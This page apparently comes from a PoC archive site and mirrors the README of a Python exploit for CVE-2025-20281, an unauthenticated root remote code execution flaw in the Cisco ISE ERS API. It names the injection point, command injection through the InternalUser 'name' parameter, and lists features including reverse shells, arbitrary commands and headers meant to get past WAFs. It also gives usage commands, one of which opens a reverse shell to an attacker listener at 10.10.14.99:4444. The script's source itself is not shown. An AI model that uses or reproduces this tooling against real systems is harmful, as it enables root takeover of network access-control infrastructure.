Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-20281 PoC — Cisco ISE API Unauthenticated Remote Code Execution Vulnerability

Source
https://github.com/ill-deed/Cisco-CVE-2025-20281-illdeed
Associated Vulnerability
Title:Cisco ISE API Unauthenticated Remote Code Execution Vulnerability (CVE-2025-20281)
Description:A vulnerability in a specific API of Cisco ISE and Cisco ISE-PIC could allow an unauthenticated, remote attacker to execute arbitrary code on the underlying operating system as root. The attacker does not require any valid credentials to exploit this vulnerability. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by submitting a crafted API request. A successful exploit could allow the attacker to obtain root privileges on an affected device.
Description
Unauthenticated Remote Code Execution exploit for CVE-2025-20281 in Cisco ISE ERS API. Execute commands or launch reverse shells as root — no authentication required.
Readme
# CVE-2025-20281 — Cisco ISE ERS API Unauthenticated RCE Exploit

This repository contains a Python 3 proof-of-concept exploit for **CVE-2025-20281**, a critical vulnerability in **Cisco Identity Services Engine (ISE)** that allows **unauthenticated remote code execution (RCE) as root** via the ERS API.

---

## 🩻 Vulnerability Overview

> The Cisco ISE ERS `/ers/sdk#_` endpoint fails to validate authentication when processing user creation requests.  
> By injecting shell commands into the `name` parameter of the `InternalUser` object, attackers can achieve command execution as root.

- **CVE ID**: [CVE-2025-20281](https://nvd.nist.gov/vuln/detail/CVE-2025-20281)
- **Affected**: Cisco ISE PAN (Policy Admin Node) with ERS enabled
- **Severity**: Critical (CVSS 9.8)
- **Authentication**: None required

---

## ⚙️ Features

- ✅ Run arbitrary commands (`--cmd`)
- ✅ Quick test with `--whoami`
- ✅ Launch reverse shells (`--reverse`)
- ✅ No authentication or session token required
- ✅ SSL warning suppression and clean output
- ✅ Legitimate headers to bypass simple WAFs

---

## 🚀 Usage

```bash
python3 CVE-2025-20281.py TARGET [--whoami | --cmd "id" | --reverse LHOST LPORT]
```

### Examples

Test command:
```
python3 CVE-2025-20281.py 192.168.1.10 --whoami
```
Run custom command:
```
python3 CVE-2025-20281.py 192.168.1.10 --cmd "id && hostname"
```
Reverse shell:
```
python3 CVE-2025-20281.py 192.168.1.10 --reverse 10.10.14.99 4444
```

---

⚠️ Legal Disclaimer

This code is provided for educational and authorized testing purposes only.
Do not use this software against networks or systems you do not own or have permission to test.

---

## 🙏 Credits

Vulnerability: Disclosed via Cisco advisory

PoC Refactor: illdeed
File Snapshot

 [4.0K]  /data/pocs/471a0aef8af35d866b84fc39e2827864013870c6
├── [2.2K]  CVE-2025-20281.py
├── [1.0K]  LICENSE
└── [1.7K]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →